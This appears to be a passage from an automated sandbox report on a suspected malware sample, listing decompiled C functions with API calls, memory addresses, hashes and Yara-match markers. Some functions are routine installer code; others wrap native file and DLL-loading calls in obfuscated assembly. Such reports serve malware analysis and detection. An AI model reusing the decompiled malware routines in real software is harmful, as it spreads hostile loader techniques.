                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405192, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 89%
                                                                                    			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a87c = _t16;
							E00404B4E();
						}
						L11:
						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404ACE(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004041C7(0x413);
				return 0;
			}





                                                                                    0x00405196
                                                                                    0x004051a0
                                                                                    0x004051bc
                                                                                    0x004051de
                                                                                    0x004051e1
                                                                                    0x004051e7
                                                                                    0x004051f1
                                                                                    0x004051f2
                                                                                    0x004051f4
                                                                                    0x004051fa
                                                                                    0x004051fa
                                                                                    0x00405204
                                                                                    0x00000000
                                                                                    0x00405212
                                                                                    0x004051c9
                                                                                    0x00405201
                                                                                    0x00405201
                                                                                    0x00000000
                                                                                    0x00405201
                                                                                    0x004051d5
                                                                                    0x004051d7
                                                                                    0x00000000
                                                                                    0x004051d7
                                                                                    0x004051a6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004051ad
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 004051C1
                                                                                    • CallWindowProcA.USER32 ref: 00405212
                                                                                      • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                                    • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                                    • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                                    • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405FDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 90%
                                                                                    			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                    0x00405fec
                                                                                    0x00405fee
                                                                                    0x00406006
                                                                                    0x0040600b
                                                                                    0x00406010
                                                                                    0x0040604d
                                                                                    0x0040604d
                                                                                    0x00406012
                                                                                    0x00406024
                                                                                    0x0040602f
                                                                                    0x00406035
                                                                                    0x0040603f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040603f
                                                                                    0x00406052

                                                                                    APIs
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,uvlcopdlxoed,0042A070,?,?,?,00000002,uvlcopdlxoed,?,00406293,80000002), ref: 00406024
                                                                                    • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,uvlcopdlxoed,uvlcopdlxoed,uvlcopdlxoed,?,0042A070), ref: 0040602F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: uvlcopdlxoed
                                                                                    • API String ID: 3356406503-3939465813
                                                                                    • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                    • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                                    • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                    • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405796, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405796(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c098->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                    0x0040579f
                                                                                    0x004057bf
                                                                                    0x004057c7
                                                                                    0x004057cc
                                                                                    0x00000000
                                                                                    0x004057d2
                                                                                    0x004057d6

                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                                    • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                                    Strings
                                                                                    • Error launching installer, xrefs: 004057A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID: Error launching installer
                                                                                    • API String ID: 3712363035-66219284
                                                                                    • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                                    • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                                    • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                                    • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403875, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00403875() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429854;
				_t3 = E0040385A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429854 =  *0x429854 & 0x00000000;
				return _t3;
			}







                                                                                    0x00403876
                                                                                    0x0040387e
                                                                                    0x00403885
                                                                                    0x00403888
                                                                                    0x00403888
                                                                                    0x0040388a
                                                                                    0x0040388f
                                                                                    0x00403896
                                                                                    0x0040389c
                                                                                    0x004038a0
                                                                                    0x004038a1
                                                                                    0x004038a9

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,73BCFA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                                    • GlobalFree.KERNEL32 ref: 00403896
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Free$GlobalLibrary
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 1100898210-3081826266
                                                                                    • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                    • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                                    • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                    • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405AD6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405AD6(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                    0x00405ad7
                                                                                    0x00405ae1
                                                                                    0x00405ae3
                                                                                    0x00405aea
                                                                                    0x00405af2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405af2
                                                                                    0x00405af4
                                                                                    0x00405af9

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405ADC
                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405AEA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrlen
                                                                                    • String ID: C:\Users\user\Desktop
                                                                                    • API String ID: 2709904686-224404859
                                                                                    • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                    • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                                    • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                    • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405BF5, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                    0x00405c05
                                                                                    0x00405c07
                                                                                    0x00405c0a
                                                                                    0x00405c36
                                                                                    0x00405c0f
                                                                                    0x00405c18
                                                                                    0x00405c1d
                                                                                    0x00405c28
                                                                                    0x00405c2b
                                                                                    0x00405c47
                                                                                    0x00405c2d
                                                                                    0x00405c34
                                                                                    0x00000000
                                                                                    0x00405c34
                                                                                    0x00405c40
                                                                                    0x00405c44
                                                                                    0x00405c44
                                                                                    0x00405c3e
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                    • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                                    • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                    • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Analysis Process: 1cec9342_by_Libranalysis.exe PID: 6840 Parent PID: 6800 1cec9342_by_Libranalysis.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 37%
                                                                                    			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                    0x00418273
                                                                                    0x0041827f
                                                                                    0x00418287
                                                                                    0x00418292
                                                                                    0x004182ad
                                                                                    0x004182b5
                                                                                    0x004182b9

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: R=A$R=A
                                                                                    • API String ID: 2738559852-3742021989
                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041826C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 37%
                                                                                    			E0041826C(signed int __eax, void* __edi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t21;
				void* _t32;
				intOrPtr* _t33;
				void* _t35;

				_t31 = __edi +  *((intOrPtr*)(__eax * 2 - 0x1374aac1));
				_t16 = _a4;
				_t33 = _a4 + 0xc48;
				E00418DC0(_t31, _t16, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t8 =  &_a32; // 0x413d52
				_t14 =  &_a8; // 0x413d52
				_t21 =  *((intOrPtr*)( *_t33))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t32, _t35); // executed
				return _t21;
			}







                                                                                    0x0041826c
                                                                                    0x00418273
                                                                                    0x0041827f
                                                                                    0x00418287
                                                                                    0x00418292
                                                                                    0x004182ad
                                                                                    0x004182b5
                                                                                    0x004182b9

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: R=A$R=A
                                                                                    • API String ID: 2738559852-3742021989
                                                                                    • Opcode ID: 7a544b5e9beb00c7abb48c378330707728f83c1694479f4e5a983f87595beab2
                                                                                    • Instruction ID: 06aea5ea9b62c8f08385dfefd69c4e159e0f69636af22cb6cae9cca6d72240a1
                                                                                    • Opcode Fuzzy Hash: 7a544b5e9beb00c7abb48c378330707728f83c1694479f4e5a983f87595beab2
                                                                                    • Instruction Fuzzy Hash: E9F0BDB6200104AFCB14DF89DC80DEB77A9FF8C354F158649FA1D97251DA34E951CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00409B20(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                    0x00409b3c
                                                                                    0x00409b3f
                                                                                    0x00409b44
                                                                                    0x00409b49
                                                                                    0x00409b53
                                                                                    0x00409b58
                                                                                    0x00409b5b
                                                                                    0x00409b5d
                                                                                    0x00409b65
                                                                                    0x00409b6a
                                                                                    0x00409b6a
                                                                                    0x00409b71
                                                                                    0x00409b79
                                                                                    0x00409b7c
                                                                                    0x00409b7e
                                                                                    0x00409b92
                                                                                    0x00000000
                                                                                    0x00409b94
                                                                                    0x00409b9a
                                                                                    0x00409b4e
                                                                                    0x00409b4e
                                                                                    0x00409b4e

                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 44filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 44%
                                                                                    			E004181BA(intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				long _t21;
				void* _t32;

				asm("int1");
				asm("das");
				asm("aad 0x5a");
				asm("sbb edx, [ebp-0x75]");
				_t15 = _a8;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DC0(_t32, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t21;
			}





                                                                                    0x004181ba
                                                                                    0x004181bb
                                                                                    0x004181bd
                                                                                    0x004181bf
                                                                                    0x004181c3
                                                                                    0x004181cf
                                                                                    0x004181d7
                                                                                    0x0041820d
                                                                                    0x00418211

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: b410dabae7d3bf98101e7d50e7c9945d6d7e0980f008fda0bfad65246244ee13
                                                                                    • Instruction ID: e51cda5be7c0432cde36c699c22da099f53b33a42e32be49aa857797f1c1653f
                                                                                    • Opcode Fuzzy Hash: b410dabae7d3bf98101e7d50e7c9945d6d7e0980f008fda0bfad65246244ee13
                                                                                    • Instruction Fuzzy Hash: 8901A4B2240108AFCB18CF99DC85DEB77E9AF8C754F158658FA0D97241C634E851CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                    0x004181cf
                                                                                    0x004181d7
                                                                                    0x0041820d
                                                                                    0x00418211

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                    • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                    • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                    Download Yara Rule
